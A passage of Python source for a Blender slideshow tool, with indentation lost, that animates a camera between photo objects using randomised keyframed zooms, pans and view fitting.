cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12 - timeFinalPhoto)
cam.location.x = centerPosition[0] + random.uniform(-0.001, 0.001)
cam.location.y = centerPosition[1] + random.uniform(-0.001, 0.001)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZEnd, zoomMaxZEnd)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def showLinePhotosGroup (self, duration=120, picNameStart=None, picNameEnd=None, zoom=None, groupStart=None, groupEnd=None):
import bpy
numPhotos = len(self.slideshow.photos)#16
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
picStart = None
if picNameStart is None:
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
picStart = bpy.data.objects[picName]
else:
picStart = bpy.data.objects[picNameStart]
zoomMinZ = 3.5
zoomMaxZ = 5.0
if zoom == 0:
zoomMinZ = 1.8
zoomMaxZ = 2.5
elif zoom == 1:
zoomMinZ = 2.5
zoomMaxZ = 3.5
elif zoom == 2:
zoomMinZ = 5.0
zoomMaxZ = 6.0
elif zoom == 3:
zoomMinZ = 7.0
zoomMaxZ = 8.0
timeStartEnd = int(duration / 6)
cam.rotation_mode = 'XYZ'
cam.location.x = picStart.location.x + random.uniform(-0.01, 0.01)
cam.location.y = picStart.location.y + random.uniform(-0.01, 0.01) + ADJUST_Y
cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
if groupStart is not None and len(groupStart) > 0:
pics = list()
for groupName in groupStart:
picGroup = bpy.data.objects[groupName]
pics.append(picGroup)
self.showObjects(pics)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.keyframe_insert(data_path="scale", frame=self.frame)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
#cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + timeStartEnd)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + timeStartEnd)
picEnd = None
if picNameEnd is None:
endIdx = random.randint(1, numPhotos)
picName = 'pic' + str(endIdx)
picEnd = bpy.data.objects[picName]
else:
picEnd = bpy.data.objects[picNameEnd]
cam.location.x = picEnd.location.x + random.uniform(-0.01, 0.01)
cam.location.y = picEnd.location.y + random.uniform(-0.01, 0.01) + ADJUST_Y
cam.location.z = picEnd.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
if groupEnd is not None and len(groupEnd) > 0:
pics = list()
for groupName in groupEnd:
picGroup = bpy.data.objects[groupName]
pics.append(picGroup)
self.showObjects(pics)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - timeStartEnd - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - timeStartEnd - 12)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
#cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def showLinePhotos (self, duration=120, picNameStart=None, picNameEnd=None, zoom=None):
import bpy
numPhotos = len(self.slideshow.photos)#16
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
picStart = None
if picNameStart is None:
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
picStart = bpy.data.objects[picName]
else:
picStart = bpy.data.objects[picNameStart]
zoomMinZ = 3.5
zoomMaxZ = 5.0
if zoom == 0:
zoomMinZ = 1.8
zoomMaxZ = 2.5
elif zoom == 1:
zoomMinZ = 2.5
zoomMaxZ = 3.5
elif zoom == 2:
zoomMinZ = 5.0
zoomMaxZ = 6.0
elif zoom == 3:
zoomMinZ = 7.0
zoomMaxZ = 8.0
timeStartEnd = int(duration / 8)
cam.rotation_mode = 'XYZ'
cam.location.x = picStart.location.x + random.uniform(-0.01, 0.01)
cam.location.y = picStart.location.y + random.uniform(-0.01, 0.01)
cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
self.showObjects([picStart])
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.keyframe_insert(data_path="scale", frame=self.frame)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
#cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + timeStartEnd)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + timeStartEnd)
picEnd = None
if picNameEnd is None:
endIdx = random.randint(1, numPhotos)
picName = 'pic' + str(endIdx)
picEnd = bpy.data.objects[picName]
else:
picEnd = bpy.data.objects[picNameEnd]
cam.location.x = picEnd.location.x + random.uniform(-0.01, 0.01)
cam.location.y = picEnd.location.y + random.uniform(-0.01, 0.01)
cam.location.z = picEnd.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects([picEnd])
cam.keyframe_insert(data_path="location", frame=self.frame + duration - timeStartEnd - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - timeStartEnd - 12)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
#cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def showRowColumn (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
endIdx = random.randint(1, numPhotos)
picName = 'pic' + str(endIdx)
pic = bpy.data.objects[picName]
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + incFrames)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + incFrames)
self.frame = self.frame + incFrames + 12.0
def showZoomInOutDuration (self, duration=120):
import bpy
numPhotos = len(self.slideshow.photos)#16
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
startZ = random.uniform(2.0, 5.0)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 1.0 + startZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
endZ = startZ - 3.0 if startZ > 3.0 else startZ + 2.0
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 1.0 + endZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration)
self.frame = self.frame + duration + 12.0
def showZoomInOut (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
startZ = random.uniform(2.0, 5.0)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 1.0 + startZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
endZ = startZ - 3.0 if startZ > 3.0 else startZ + 2.0
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 1.0 + endZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + incFrames)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + incFrames)
self.frame = self.frame + incFrames + 12.0
#Se acerca y se aleja de una foto
def showDeleite (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
mitad1Frames = incFrames/2
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
initZ = 2.0
startZ = random.uniform(2.0, 5.0)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(incFrames/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(incFrames/2))
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + incFrames)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + incFrames)
self.frame = self.frame + incFrames + 12.0
def showDeleiteDuration (self, duration=120, picName=None):
import bpy
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
if picName is None:
print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> numPHOTOSOSSSSSSSSSSSS = " + str(numPhotos))
numPhotos = len(self.slideshow.photos)#16
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
initZ = 2.0
startZ = random.uniform(2.0, 5.0)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2))
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def showObjects (self, selection):
import bpy
scene = bpy.context.scene
for obj in scene.objects:
obj.select = False
for obj in selection:
obj.select = True
bpy.ops.view3d.camera_to_view_selected()
'''
def getDistanceMaxXY (self, pic1, pic2):
result = None
result = (maxX, maxY)
return result
'''
'''
from bpy import context
# Select objects that will be rendered
for obj in scene.objects:
obj.select = False
for obj in context.visible_objects:
if not (obj.hide or obj.hide_render):
obj.select = True
bpy.ops.view3d.camera_to_view_selected()
'''
'''
camera_fit_coords(scene, coordinates)
Compute the coordinate (and scale for ortho cameras) given object should be to ‘see’ all given coordinates
Parameters:
scene (Scene) – Scene to get render size information from, if available
coordinates (float array of 1 items in [-inf, inf], (never None)) – Coordinates to fit in
Return (co_return, scale_return):
co_return, The location to aim to be able to see all given points, float array of 3 items in [-inf, inf]
scale_return, The ortho scale to aim to be able to see all given points (if relevant), float in [-inf, inf]
'''
#Se acerca y se aleja de una foto
def showDeleiteTwoPhotos (self, duration=120, picName1=None, picName2=None):
import bpy
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
if picName1 is None:
numPhotos = len(self.slideshow.photos)
startIdx = random.randint(1, numPhotos)
picName1 = 'pic' + str(startIdx)
pic1 = bpy.data.objects[picName1]
if picName2 is None:
numPhotos = len(self.slideshow.photos)
startIdx = random.randint(1, numPhotos)
picName2 = 'pic' + str(startIdx)
pic2 = bpy.data.objects[picName2]
pos = [0, 0, 0]
pos[0] = (pic1.location.x + pic2.location.x) / 2.0
pos[1] = (pic1.location.y + pic2.location.y) / 2.0
pos[2] = (pic1.location.z + pic2.location.z) / 2.0
#initZ1 = random.uniform(5.0, 5.5)
#initZ2 = random.uniform(4.5, 5.0)
initZ1 = random.uniform(3.01, 3.5)
initZ2 = random.uniform(2.5, 3.0)
#factorRandom1 = random.uniform(0.26, 0.31)
factorRandom1 = random.uniform(0.01, 0.05)
factorRandom2 = random.uniform(0.01, 0.05)
cam.rotation_mode = 'XYZ'
cam.location.x = pos[0] + random.uniform(- factorRandom1, factorRandom1)
cam.location.y = pos[1] + random.uniform(- factorRandom1, factorRandom1) + ADJUST_Y
cam.location.z = pos[2] + initZ1
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.keyframe_insert(data_path="scale", frame=self.frame)
'''
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2))
'''
cam.location.x = pos[0] + random.uniform(factorRandom2, factorRandom2)
cam.location.y = pos[1] + random.uniform(factorRandom2, factorRandom2) + ADJUST_Y
cam.location.z = pos[2] + initZ2
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
'''
scene = bpy.context.scene
c1Pic1 = self.getCorner1(pic1)
c2Pic1 = self.getCorner2(pic1)
c3Pic1 = self.getCorner3(pic1)
c4Pic1 = self.getCorner4(pic1)
c1Pic2 = self.getCorner1(pic2)
c2Pic2 = self.getCorner2(pic2)
c3Pic2 = self.getCorner3(pic2)
c4Pic2 = self.getCorner4(pic2)
co_return, scale_return = cam.camera_fit_coords(scene, (c1Pic1[0], c1Pic1[1], c1Pic1[2], c2Pic1[0], c2Pic1[1], c2Pic1[2], c3Pic1[0], c3Pic1[1], c3Pic1[2], c4Pic1[0], c4Pic1[1], c4Pic1[2], c1Pic2[0], c1Pic2[1], c1Pic2[2], c2Pic2[0], c2Pic2[1], c2Pic2[2], c3Pic2[0], c3Pic2[1], c3Pic2[2], c4Pic2[0], c4Pic2[1], c4Pic2[2]))
cam.location.x = co_return[0]
cam.location.y = co_return[1]
#cam.location.z = co_return[2]
cam.scale[0] = scale_return
cam.scale[1] = scale_return
cam.scale[2] = scale_return
'''
self.showObjects([pic1, pic2])
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
#cam.keyframe_insert(data_path="scale", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def getCorner1 (self, pic):
result = None
result = [0, 0, 0]
result[0] = pic.location.x - (pic.dimensions[0]/2.0)
result[1] = pic.location.y + (pic.dimensions[1]/2.0)
result[2] = pic.location.z
return result
def getCorner2 (self, pic):
result = None
result = [0, 0, 0]
result[0] = pic.location.x + (pic.dimensions[0]/2.0)
result[1] = pic.location.y + (pic.dimensions[1]/2.0)
result[2] = pic.location.z
return result
def getCorner3 (self, pic):
result = None
result = [0, 0, 0]
result[0] = pic.location.x - (pic.dimensions[0]/2.0)
result[1] = pic.location.y - (pic.dimensions[1]/2.0)
result[2] = pic.location.z
return result
def getCorner4 (self, pic):
result = None
result = [0, 0, 0]
result[0] = pic.location.x + (pic.dimensions[0]/2.0)
result[1] = pic.location.y - (pic.dimensions[1]/2.0)
result[2] = pic.location.z
return result
#Se acerca y se aleja de una foto
def showDeleiteOnePhoto (self, duration=120, picName=None):
import bpy
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
if picName is None:
numPhotos = len(self.slideshow.photos)
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
#initZ1 = random.uniform(2.51, 3.0)
#initZ2 = random.uniform(2.0, 2.5)
initZ1 = random.uniform(2.01, 2.5)
initZ2 = random.uniform(1.8, 2.0)
#factorRandom1 = random.uniform(0.06, 0.10)
factorRandom1 = random.uniform(0.01, 0.05)
factorRandom2 = random.uniform(0.01, 0.05)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(- factorRandom1, factorRandom1)
cam.location.y = pic.location.y + random.uniform(- factorRandom1, factorRandom1) + ADJUST_Y
cam.location.z = pic.location.z + initZ1
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.keyframe_insert(data_path="scale", frame=self.frame)
'''
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2))
'''
cam.location.x = pic.location.x + random.uniform(factorRandom2, factorRandom2)
cam.location.y = pic.location.y + random.uniform(factorRandom2, factorRandom2) + ADJUST_Y
cam.location.z = pic.location.z + initZ2
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
'''
scene = bpy.context.scene
c1Pic1 = self.getCorner1(pic)
c2Pic1 = self.getCorner2(pic)
c3Pic1 = self.getCorner3(pic)
c4Pic1 = self.getCorner4(pic)
co_return, scale_return = cam.camera_fit_coords(scene, (c1Pic1[0], c1Pic1[1], c1Pic1[2], c2Pic1[0], c2Pic1[1], c2Pic1[2], c3Pic1[0], c3Pic1[1], c3Pic1[2], c4Pic1[0], c4Pic1[1], c4Pic1[2]))
cam.location.x = co_return[0]
cam.location.y = co_return[1]
#cam.location.z = co_return[2]
cam.scale[0] = scale_return
cam.scale[1] = scale_return
cam.scale[2] = scale_return
'''
self.showObjects([pic])
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
#cam.keyframe_insert(data_path="scale", frame=self.frame + duration - 12)
self.frame = self.frame + duration
#Se acerca y se aleja de una foto
def showDeleiteOnePhotoProject (self, duration=120):
import bpy
numPhotos = len(self.slideshow.photos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
initZ1 = random.uniform(1.5, 1.8)
initZ2 = random.uniform(1.5, 1.8)
initZ3 = random.uniform(1.5, 1.8)
factorRandom1 = random.uniform(0.50, 1.00)
factorRandom2 = random.uniform(0.01, 0.05)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01 - factorRandom1, 0.01 + factorRandom1)
cam.location.y = pic.location.y + random.uniform(-0.01 - factorRandom1, 0.01 + factorRandom1)
cam.location.z = pic.location.z + initZ1
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
'''
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2))
'''
cam.location.x = pic.location.x + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.y = pic.location.y + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.z = pic.location.z + initZ2
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + (duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + (duration/2))
cam.location.x = pic.location.x + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.y = pic.location.y + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.z = pic.location.z + initZ3
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + (duration))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + (duration))
self.frame = self.frame + duration
#Se acerca y se aleja de una foto
def showDeleiteOnePhotoSection (self, duration=120):
import bpy
numPhotos = len(self.slideshow.photos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
initZ1 = random.uniform(4.5, 6.0)
initZ2 = random.uniform(3.0, 4.0)
factorRandom1 = random.uniform(0.50, 1.00)
factorRandom2 = random.uniform(0.01, 0.05)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01 - factorRandom1, 0.01 + factorRandom1)
